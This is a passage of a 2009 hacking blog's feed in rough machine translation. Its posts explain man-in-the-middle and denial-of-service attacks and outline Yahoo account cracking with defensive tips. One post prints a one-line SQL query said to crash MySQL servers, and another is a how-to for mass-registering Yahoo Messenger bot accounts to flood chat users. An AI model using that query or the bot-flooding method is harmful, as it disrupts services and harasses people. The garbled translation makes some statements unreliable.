communicating. But actually the biggest strength of mitm not sniffingnya ability, but the ability to intercept and modify communications mitm attack that could be called the type of active attack.&lt;br /&gt;&lt;br /&gt;The figure below is a scenario that can be done with the attack mitm attacker.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/Su_RtZMMNQI/AAAAAAAAAQw/RqhkSXeVH38/s1600-h/mitm_scenario1-300x206.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 300px; height: 206px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/Su_RtZMMNQI/AAAAAAAAAQw/RqhkSXeVH38/s400/mitm_scenario1-300x206.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5399765056026850562" /&gt;&lt;/a&gt;&lt;br /&gt;In the picture there looks like 4 attacks that can be done with the MITM. Here is an explanation of the types of attacks in scenarios like the picture above.&lt;br /&gt;&lt;br /&gt;     *&lt;span style="font-weight:bold;"&gt; Sniffing:&lt;/span&gt; Charlie knows all the conversations between Alice and Bob.&lt;br /&gt;     * &lt;span style="font-weight:bold;"&gt;Intercepting:&lt;/span&gt; Charlie intercept a message from Alice when Alice wants to close the conversation with "Bob I'm going to sleep, Bye!". In this way Bob thinks Alice is still communicate with him.&lt;br /&gt;     * &lt;span style="font-weight:bold;"&gt;Tampering:&lt;/span&gt; Charlie alter response from Bob to Alice bob Paypal account to charlie.&lt;br /&gt;     * &lt;span style="font-weight:bold;"&gt;Fabricating:&lt;/span&gt; Charlie asked a number of social security number to Bob, when this question was never asked by Alice.&lt;br /&gt;&lt;br /&gt;Mitm this way you can imagine how much potential damage can be done Charlie to Alice and Bob.&lt;br /&gt;&lt;br /&gt;The attack happened Process Man-in-the-Middle&lt;br /&gt;&lt;br /&gt;In mitm attack, an attacker would be in the middle of communication between two parties. The whole conversation going on between them should be through the attacker was in the middle. Attacker freely conduct surveillance, interception, modification and even falsified communication as I described earlier.&lt;br /&gt;&lt;br /&gt;Now let us look at the process of MITM in case of Alice communicates with Bob. Charlie as the attacker will try to be in the middle between Alice and Bob. Charlie managed in order to be in the middle, then Charlie should:&lt;br /&gt;&lt;br /&gt;     * Masquerading as Bob before Alice&lt;br /&gt;     * Masquerading as Alice in front of Bob &lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/Su_S5wXAebI/AAAAAAAAAQ4/VNZCCO5Wk14/s1600-h/mitm_flow-300x191.png"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 300px; height: 191px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/Su_S5wXAebI/AAAAAAAAAQ4/VNZCCO5Wk14/s400/mitm_flow-300x191.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5399766367916292530" /&gt;&lt;/a&gt;&lt;br /&gt;In mitm, Alice thought was talking with Bob, when he was talking to Charlie. So is Bob, he thought was talking to Alice, when in fact he was talking to Alice. So in order to become one in the middle of Charlie must be disguised in the two sides, not just on one side only.&lt;br /&gt;&lt;br /&gt;Why Alice and Bob can be trapped and deceived by Charlie? That's because Alice and Bob did not do authentication before communication. Alice ensure authentication will speak with Bob original, not the fake Bob played by Charlie. So also with authentication, Bob will speak with the original Alice, not the fake Alice played by Charlie.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Importance of Authentication: &lt;/span&gt;Who Are You Speaking With?&lt;br /&gt;&lt;br /&gt;Authentication is the process to prove the identity of a subject, to people or machines. The process of proving identity seeorang many ways, but they can be grouped into 3 categories:&lt;br /&gt;&lt;br /&gt;     * What you know: a PIN, password, public key-pair private&lt;br /&gt;     * What you have: a smart card, key, USB dongle&lt;br /&gt;     * What you are: fingerprint, retina&lt;br /&gt;&lt;br /&gt;Authentication briefly answer the question "Who are you speaking with?". The question was very important to know before the two parties to communicate. If the two parties to communicate without prior authentication, then they can get stuck talking to the wrong person, the person pretending to be his interlocutor. If until this happens the consequences can be fatal, one of which is the mitm attack.&lt;br /&gt;&lt;br /&gt;When two people who already knew each other talked to in person, it can not be both trapped and deceived speak with the wrong people. Authentication becomes very important when the two sides talked through remote communication media such as telephone or internet. In the long-distance communication, we can only hear our speaker, so it is very likely we are talking to the wrong person.&lt;br /&gt;&lt;br /&gt;So how to prevent MITM attacks is to perform authentication before communication. Even though the authentication performed by one party only, it is enough to prevent mitm. Let's look back to the example Alice, Bob and Charlie, if the authentication is only done by Bob, while Alice does not. The absence of authentication Alice, so Charlie could masquerade as Alice in front of Bob, but Charlie can not masquerade as Bob in front of Alice. Charlie Why can not disguise a Bob? Because Alice will test the authenticity of Bob with authentication, so disguises fake Charlie as Bob and Alice would be exposed would not want to continue communication.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-7892247184906048009?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/7892247184906048009/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/11/know-attacks-man-in-middle-mitm.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7892247184906048009'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7892247184906048009'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/11/know-attacks-man-in-middle-mitm.html' title='Know Attacks Man-in-the-Middle (MITM)'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Dctv9GCvTgs/Su_RtZMMNQI/AAAAAAAAAQw/RqhkSXeVH38/s72-c/mitm_scenario1-300x206.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-1447752156658886361</id><published>2009-11-02T22:08:00.000-08:00</published><updated>2009-11-02T22:27:46.201-08:00</updated><title type='text'>Understanding Denial of Service Attack</title><content type='html'>In this article I will explain about the types of attacks that can be said there is no cure, ie denial of service or DoS. If the DoS attack was conducted in a gang and organized well, it will produce tremendous damage and can paralyze popular sites like twitter.com and metasploit.com.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;What is DoS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Denial of service is a type of attack whose purpose is to prevent users who actually enjoy the services provided servers. Server as the name is a servant who must always be ready to serve user requests, which generally operate 24 hours without stopping. Examples are in charge of the web server serves web visitors to provide information in the form of html pages. In normal circumstances, visitors can request a resource from the web server to be displayed in the &lt;span class="fullpost"&gt;browser, but if the web server DoS attack so visitors can enjoy the web services server.&lt;br /&gt;&lt;br /&gt;In general there are 2 ways to DoS attacks:&lt;br /&gt;&lt;br /&gt;    1. Lethal Server&lt;br /&gt;    2. Server busy&lt;br /&gt;           * No bug / vulnerability&lt;br /&gt;           * Why exploits a bug / vulnerability&lt;br /&gt;&lt;br /&gt;Denial by Deadly Server: Kill Them!&lt;br /&gt;&lt;br /&gt;You never have to use a pay phone or ATM but could not because the machine is attached paper with the message "Out of Service" or "Medium in the improvement". Public phones are the target of DoS attacks are common, everywhere we find a general phone damaged by such DoS attacks slammed down the phone, unplugged, the LCD broke and other actions.&lt;br /&gt;&lt;br /&gt;The purpose of this attack is to cause the server to shutdown, reboot, crash, "not responding". So these attacks result in damage to the persistent nature means DoS condition will still occur even if the attacker has stopped attacking, the new server back to normal after di-restart/reboot.&lt;br /&gt;&lt;br /&gt;How can this be done DoS attack? The attack was carried out to exploit the bug / vulnerability on the server. Keyword in the vulnerability of this type usually is "specially / carefully crafted packet / request", which means a specially designed package. Why is specially designed? Because the package contains a certain qualities that make the server process dies when that particular package.&lt;br /&gt;&lt;br /&gt;Let us consider some examples of the resulting vulnerability to DoS attacks:&lt;br /&gt;&lt;br /&gt;     * Ping of Death (CA-1996-26)&lt;br /&gt;&lt;br /&gt;       This is the kind of bug that is very old. Practically no longer a system is vulnerable to the bug. This bug when diexploit will make the server crash, freeze or reboot. This attack is done by sending "specially crafted" packets in the form of oversized ICMP packet, the packet size above normal. When the server receives and processes packets that "weird" is, then the server will crash, freeze or reboot. This is an example of DoS attacks "one shot one kill" because it can damage the server with only one shot.&lt;br /&gt;     * MySQL query IF DoS (SA25188)&lt;br /&gt;&lt;br /&gt;       This bug will make mysql server to crash just by sending a special sql function containing IF () example: "SELECT id from example WHERE id IN (1, (SELECT IF (1 = 0,1,2 / 0 )))". It's also kind of attack a "one shot one kill".&lt;br /&gt;&lt;br /&gt;     * Cisco Global Site Selector DNS Request Denial of Service (SA33429)&lt;br /&gt;&lt;br /&gt;       This bug made DNS server by sending Cisco died several "specially crafted" request control packet in a particular order.&lt;br /&gt;&lt;br /&gt;The three examples above would be sufficient to provide a description of how this type of DoS attack performed. At its core is the attacker take advantage of (read: mengexploit) bug that makes servers stop working and are usually done alone remotely by sending a specially crafted packet.&lt;br /&gt;&lt;br /&gt;Denial by busied Server: Make Them As Busy As Possible!&lt;br /&gt;&lt;br /&gt;At the time before Lebaran we often feel so hard to send sms, often even failed to send. Similarly, when going on a quiz show on TV, the number mengelpon to answer the quiz was so difficult. This happens because there are so many people who send sms during Lebaran and called at the time of the quiz, making telecommunication networks have become so busy that could not serve another user. The incident is similar to what happens when a server is a denial of service attack. Denial is happening in these events is not the kind of deadly DoS the server, but the type of DoS the server busy.&lt;br /&gt;&lt;br /&gt;Type of DoS is temporary, the server will return to normal when the attacker stops sending requests to a busy server.&lt;br /&gt;&lt;br /&gt;Denial of this type is divided again into 2 types based on the way to attack:&lt;br /&gt;&lt;br /&gt;     * Exploiting vulnerability: Attacking with malicious request / packet&lt;br /&gt;     * No vulnerability exploitation: Attacking with the normal request / packet&lt;br /&gt;&lt;br /&gt;Creating server vulnerability mengexploitasi busy with more quickly than without mengeksploit vulnerability.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Make Server Busy by Exploiting Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In this type of DoS attack, the attacker take advantage of a bug that makes servers using excessive resource (cpu, memory, disk space, etc.). Attacker will figure out how to make the server work extra hard (much harder than a normal request) to serve her request. Usually this type of DoS attack is not the form of attack "one shot one kill". The attack carried out by doing a lot of requests with each request to the server consume more resources than a normal request.&lt;br /&gt;&lt;br /&gt;In simple math, if the attacker could cause the server to work for 10 seconds only to serve him (eg, normally 0.1 seconds), then the attacker can send a request to create a server 1.000x serve him for 10,000 seconds (2.7 hours more), so create another user can not enjoy the server service.&lt;br /&gt;&lt;br /&gt;To better understand this type of DoS, let's look at the examples that can diexploit vulnerability to DoS attacks of this type:&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt;     * TCP SYN Flood Denial&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;       This is a DoS attack that is very old. Attacker attacks by flooding the server with requests of malicious SYN packets with fake source IP address. SYN packet is a packet from the client that initiated the formation of TCP / IP, then the server will respond with a SYN-ACK, and is equipped with a SYN-ACK packet-ACK from the client, this process is referred to three three-way handshake.&lt;br /&gt;&lt;br /&gt;       The trick is to fake the source IP address in the SYN packet from the client. As a result the server will send a SYN-ACK (step 2) to the wrong ip address that the server will not get a reply SYN-ACK-ACK from the client. Yet for every client who tried to open a connection, the server will allocate resources such as memory and time to wait for an ACK from the client replies. In this way the attacker to spend resources to serve only server false requests from the attacker.&lt;br /&gt;     &lt;span style="font-weight:bold;"&gt;* Mod_deflate Apache DoS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;       Apache using mod_deflate to compress the files. When the visitor asked for a file, then Apache will use mod_deflate to compress them and then send it to the visitor. But if in the middle of the process of compression, TCP connection decided visitor, Apache still working compress the files to the actual visitor is not there (was disconnect). So bugnya is the cpu resource usage borosnya to compress the files to the client that no longer exists.&lt;br /&gt;&lt;br /&gt;       Attacker take advantage of this weakness by asking for a large file, then in a short time so decided to make server connections to work hard for the visitor mempatkan files that no longer exists. This request is repeated many times until the server is so busy and exhausted all the cpu resources.&lt;br /&gt;&lt;br /&gt;Two examples above vulnerability is explained how this type of DoS attack performed. At its core is to send a lot of malicious request / package to the server consume more resources and more time for each request is.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Make Busy Without Exploiting Server Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is the kind of attacks that rely on the ability to send requests to normal as much as possible so that the server becomes busy. The difference this type of DoS DoS vulnerability that is mengexploit on the request. Request sent on this type of DoS is a normal request as the user, so the server does not consume excessive resources. While DoS vulnerability that relies on sending specially crafted malicious requests to make the server consume more resources to serve the malicious request.&lt;br /&gt;&lt;br /&gt;Normal requests cause the server to consume only the resources in the amount of mediocre, will not affect the overall server. Normally required number of requests in a very much disturbed to make the server work. So for this attack to be effective, then the attack must be made a gang from many places, the more attackers the better the results. This attack is also called a distributed DoS (DDoS) because it is done from many locations distributed (spread).&lt;br /&gt;&lt;br /&gt;DDoS attacks carried out by using zombies or robots. Zombies are computers that are controlled so that attackers can be controlled remotely. A set of zombie computers to form networks called bot-net. Attacker get a lot of zombies with a spreading virus or worm, which infected every computer you install into a computer program that will run the commands from the attacker.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt;Botnet DDoS Attack&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/Su_MpOKzDwI/AAAAAAAAAQo/gmXPIVAyA_Y/s1600-h/ddos.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 179px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/Su_MpOKzDwI/AAAAAAAAAQo/gmXPIVAyA_Y/s400/ddos.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5399759486790602498" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Courtesy of: www.dos-attack.net&lt;br /&gt;&lt;br /&gt;The picture above explains how the DDoS. Attacker gave orders to all forces to make HTTP requests to a website. If the attacker-controlled army is very large, then the web server will be swamped with requests that become too busy and can not be accessed by users who actually (real visitors).&lt;br /&gt;&lt;br /&gt;This type of attack there is no cure because the attacker does not exploit any bug or vulnerability. If on the other types of DoS attacks can be prevented by patching or updating software, then this attack can not be stopped with the updates or patches.&lt;br /&gt;&lt;br /&gt;Conclusion&lt;br /&gt;&lt;br /&gt;Is a denial of service attacks that cause the server can not serve the real users. Here are the types of DoS attacks based on the way to attack:&lt;br /&gt;&lt;br /&gt;     * Turn off the server: one shot, one kill to your server crashes, hangs, reboot.&lt;br /&gt;     * Busy server: sending so many requests to make the server busy.&lt;br /&gt;           o Exploiting the bug: send a lot of specially crafted request. The number of requests is not as much of a busy server DoS with the normal request.&lt;br /&gt;           o Normal requests: send a lot of user requests as normal as usual. Required number of requests for more than a busy type of DoS exploit servers with bugs. Usually used in a distributed botnet. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-1447752156658886361?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/1447752156658886361/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/11/understanding-denial-of-service-attack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1447752156658886361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1447752156658886361'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/11/understanding-denial-of-service-attack.html' title='Understanding Denial of Service Attack'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Dctv9GCvTgs/Su_MpOKzDwI/AAAAAAAAAQo/gmXPIVAyA_Y/s72-c/ddos.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-4954830673923131856</id><published>2009-10-17T11:28:00.000-07:00</published><updated>2009-10-17T11:30:40.534-07:00</updated><title type='text'>Making ID Boot (Bot) Yahoo Messenger</title><content type='html'>Just like a state or kingdom who want to advance the war, of course, you have to prepare ammunition and soldiers or soldiers who will fight on the field fighting. If you are a rebel or the mafia, you would have to prepare your subordinates and weapons to face your enemy or your opponent. In reply to opponents in the world serawan Yahoo Messenger, ID Boot (Bot) is absolutely necessary as a soldier or a bullet to attack the opponent. Boot software as a war machine needed ammunition to shoot your opponent. This ammunition is none other than the &lt;span class="fullpost"&gt;ID does not Boot (Bot). Boot normally load ID Boot (Bot) which was registered in the Yahoo Server to war activities. Thus you must make your first soldier to Om Yahoo registered as a land of war. Like war Barathayuda your soldiers must go into battle before he could fight against the approaching enemy. How do I register ID Boot (Bot) anda.1. You can make ID Boot (Bot) like when you make your chat ID. Thus, for 1 or 1 soldier you must register boots long enough to follow all sorts of procedures that must run. Enter a code, type the name, and so on. One note for you, do not make the chat ID everyday you become ID Boot (Bot) or you log into your Boot. This avoids the possibility of a ban from Yahoo Party. The term cool your ID got banned from yahoo so that your ID can not be used again. Repeat steps to make ID's to taste. The more the better. Boot can load the ID Boot (Bot) until 1000 ID, and some have up to 10,000. Well you must be exhausted to make ID Boot (Bot) if it reaches 1000. How much time do you spend in front of the computer connected to the virtual world just to make ID Boot (Bot) up to 1000 pieces. Capeek not. So to avoid this software was made specifically to make ID Boot (Bot). &lt;br /&gt;2. Find Software ID Creator on the site or sites of anti boot boot. Having got it running on your computer and do not forget to check your Internet connection. By using ID Creator you only need to write the name ID Boot (Bot) and password only. And leave all that crap enrollment into battle Yahoo to the Creator ID. Usually ID Creator makes a boot to provide ID Boot Option (Bot) like this: boot1, boot2, boot3, and so on. Password in order to more easily reconcile it. However, using the ID Boot (Bot) is identical to one another and are distinguished only by the number of anti boot normally will recognize it and then put in the category immediately removed the boot and away. Usually ID Boot (Bot) like this is very noticeable when the login to the Chat Room. But the advantages of ID in this way is the ease of making. &lt;br /&gt;&lt;br /&gt;Once you have finished making ID Boot (Bot) that do not forget to save the name ID Boot (Bot) you and paswordnya in Note Pad. Boot software requires ID Boot (Bot) and password when you load or boot melogin through note pad. Save and you name the file with your name at will. Usually still be given the name Bots. Display in Note Pad is like this: &lt;br /&gt;&lt;br /&gt;Bot1: password &lt;br /&gt;Bot2: password &lt;br /&gt;Bot3: password &lt;br /&gt;Etc. .. &lt;br /&gt;&lt;br /&gt;For clarity I give ID Boot (Bot) I've ever used before: &lt;br /&gt;&lt;br /&gt;manusia_laut :****** &lt;br /&gt;rumput_laut_merah :****** &lt;br /&gt;rumput_teki_menyakitkan :****** &lt;br /&gt;babi_gila_amuk :****** &lt;br /&gt;kepala_pecah_seribu :****** &lt;br /&gt;seribu_hantu :****** &lt;br /&gt;jangkrik_mati :****** &lt;br /&gt;celeng_mengamuk :****** &lt;br /&gt;srigala_lapar_mengamuk :****** &lt;br /&gt;nendang_perut :****** &lt;br /&gt;mulut_buaya :****** &lt;br /&gt;lidah_neraka :****** &lt;br /&gt;lahar_merapi_merah :****** &lt;br /&gt;terkaman_singa :****** &lt;br /&gt;neraka_durhaka :****** &lt;br /&gt;surga_panas :****** &lt;br /&gt;geraman_guntur :****** &lt;br /&gt;sujud_dusta :****** &lt;br /&gt;telinga_kentut :****** &lt;br /&gt;sembayang_terlaknat :****** &lt;br /&gt;gelisah_pencarian :****** &lt;br /&gt;guntur_meledak :****** &lt;br /&gt;gembira_tersenyum :****** &lt;br /&gt;etc. ... &lt;br /&gt;&lt;br /&gt;****** Is the password for each of ID Boot (Bot), in my example above the password for each of ID Boot (Bot) different from each other. While gembira_tersenyum, guntur_meledak, etc. is ID Boot (Bot). To be more beautiful and has a certain aesthetic, change your nickname and perhiaslah boot with "membatiknya". See my other writing about batik ID. If you receive ID Boot (Bot) with the above names, can be sure it came from me. But you do not worry, I will not use it anymore. At best make only my regular chat aja kok. If more males pake ID recurrence normally. You can also use the most often used by Booter: &lt;br /&gt;&lt;br /&gt;modaro_kowe_cah01: bootersejati &lt;br /&gt;modaro_kowe_cah02: bootersejati &lt;br /&gt;modaro_kowe_cah03: bootersejati &lt;br /&gt;modaro_kowe_cah04: bootersejati &lt;br /&gt;modaro_kowe_cah05: bootersejati &lt;br /&gt;modaro_kowe_cah06: bootersejati &lt;br /&gt;modaro_kowe_cah07: bootersejati &lt;br /&gt;modaro_kowe_cah08: bootersejati &lt;br /&gt;modaro_kowe_cah09: bootersejati &lt;br /&gt;modaro_kowe_cah10: bootersejati &lt;br /&gt;and so on ... &lt;br /&gt;&lt;br /&gt;"Modaro_kowe_cah01" .. ff is ID Boot (Bot) while "bootersejati" is a password. Separator between ID Boot (Bot) and the password is also wearing a space or; or the other. Depending on the boot software. Uh, was just an example loch, do not try to diloginkan ym, entar sorry that you can not login. &lt;br /&gt;Bots with examples like this the most easily recognized by the anti-boot. &lt;br /&gt;&lt;br /&gt;Do not login with a lot ID Boot (Bot) if your connection is weak or lelet, can-can you disconnect yourself later. More and more bots are in the longer login you also prepare yourself for bot attack takes time to prepare ammunition. Adjust more or less the pengen Id at login with your Internet connection &lt;br /&gt;&lt;br /&gt;This is just info. Please do not be misused. &lt;br /&gt;Hopefully useful.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-4954830673923131856?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/4954830673923131856/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/10/making-id-boot-bot-yahoo-messenger.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4954830673923131856'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4954830673923131856'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/10/making-id-boot-bot-yahoo-messenger.html' title='Making ID Boot (Bot) Yahoo Messenger'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2822099216272177510</id><published>2009-10-17T11:25:00.000-07:00</published><updated>2009-10-17T11:26:41.295-07:00</updated><title type='text'>Cracking or ID or username Hacking Yahoo Messenger (Including Email): Just Introduction and how to overcome</title><content type='html'>Here I will teach you about ways to cracking yahoo id or something. Here I will only give a general overview of the ways a person id theft or cracking or hacking ID yahoo messenger or yahoo email address as well as short tips, or events like this event. &lt;br /&gt;&lt;br /&gt;Cracking yahoo ID can be done in various ways. The most often committed is by using some tools or some crack software tools. To conduct activities to crack this software required basic knowledge about the use of a proxy or &lt;span class="fullpost"&gt;your Internet connectivity. Proxy is used to loop or repeat the experiment each time because the crack is very, very risky to cracking without using a proxy or other safety devices. Knowledge of the use of a password is also required. And most importantly the necessary username. Cracking activity is also done well for several hundred ps or username. So the first thing needed by the cracker is: list username or id or email address on yahoo, password list, proxy list (there are also tools that do not require a proxy). &lt;br /&gt;&lt;br /&gt;I mentioned above is a way of cracking yahoo id through a specific tool. While cracking id also be done by creating a fake website that requires someone to write your username or id and password and then id and password are sent to the cracker. This method is useful if the user is less thorough. To further make this work or get a list of id and password crackers usually given a warning email or can also send instant messages or PM message (usually spam) to the user yahoo messenger. Tool required is YM PM spammers or Yahoo e-mail bombing. Can also be done manually &lt;br /&gt;&lt;br /&gt;Now after knowing these two ways (there are several other ways, but the most common and easiest way is with two way), I want to give some tips to avoid things like that. &lt;br /&gt;&lt;br /&gt;First: remember yahoo messenger and yahoo mail is the tool or facility that is free or free so anyone can easily use it and the yahoo did not care if the email or YM id you get this sort of thing. To avoid cracking the first way you need to strengthen your password as often suggested. Such as using more than 8 characters. Do not use your name, your birth date, or use a password with a word that is often used or contained in the dictionary. Using a variety of characters both good numbers, upper and lower case and the other characters. Make no sound or can not read. (This avoids the presence of your password in password cracking their list. &lt;br /&gt;&lt;br /&gt;Second. To avoid the second way you must be aware that if there is an email or private message that directs you to write your yahoo password. Whether it is in the form of private message windows (AM or IM) or in the form of pages of a site (webpage). &lt;br /&gt;&lt;br /&gt;The fourth is to avoid lock id ym do not use your email for chat on yahoo messenger world. &lt;br /&gt;&lt;br /&gt;Fifth. It would be better if you use a paid e-mail or have the reversibility (the ability through the service) is good. It could also be from your company email or your institution or service your own email. In this way, in case of cracking process and the cracker change your password (if lucky because they could destroy the contents of your mail), you can ask the admin or webmasternya to return or give back the email address on the crack. Yahoo party does not provide this to you. You want to complain to yahoo om, I'm sure will not respond and had to make a new account. Not dangerous. But this risk has a free e-mail. &lt;br /&gt;&lt;br /&gt;So just sharing &lt;br /&gt;Hopefully Helpful&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2822099216272177510?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2822099216272177510/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/10/cracking-or-id-or-username-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2822099216272177510'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2822099216272177510'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/10/cracking-or-id-or-username-hacking.html' title='Cracking or ID or username Hacking Yahoo Messenger (Including Email): Just Introduction and how to overcome'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2598413271084429205</id><published>2009-09-26T00:57:00.000-07:00</published><updated>2009-10-08T05:42:46.651-07:00</updated><title type='text'>Protect Your Blog From Plagiarize (Copy Paste)</title><content type='html'>May be you will be angry if your articel shown in other blog unexpectedly, moreover it without inserting the resource. I'll show you how to protect your blog from theif. But this trcik is pointed for small thief because it unusefull for expert thief. With this trick, the thief will unable to select your articel and unable to right click in your blog. But if you don't &lt;span class="fullpost"&gt;care about plagiarize, you will don't need this trick. Ok lets begin.&lt;br /&gt;&lt;br /&gt;Go to your blog setting then chose "Template --&gt; Edit HTML". Find this code  then replace with this code&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now your blog will be disable selecting and righ click, but the thief can still steal your articel by select "views --&gt; page source" menu from their browser or by pressing "Ctrl + u", they can see your source code and can copy the articel from it. To deceive this, put your mouce cursor before this code  then press "enter" button many times, may be about 100 times :D the save your editting . Now if they press "Ctrl + u" they will only see a litle codes, he..he.. :D&lt;br /&gt;&lt;br /&gt;But remember this trick is only work for a fool thieves, for an expert thieves is unusable.&lt;br /&gt;I don't use it into my blog because there are many script that have to be copied by readers.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2598413271084429205?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2598413271084429205/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/09/protect-your-blog-from-plagiarize-copy.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2598413271084429205'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2598413271084429205'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/09/protect-your-blog-from-plagiarize-copy.html' title='Protect Your Blog From Plagiarize (Copy Paste)'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' 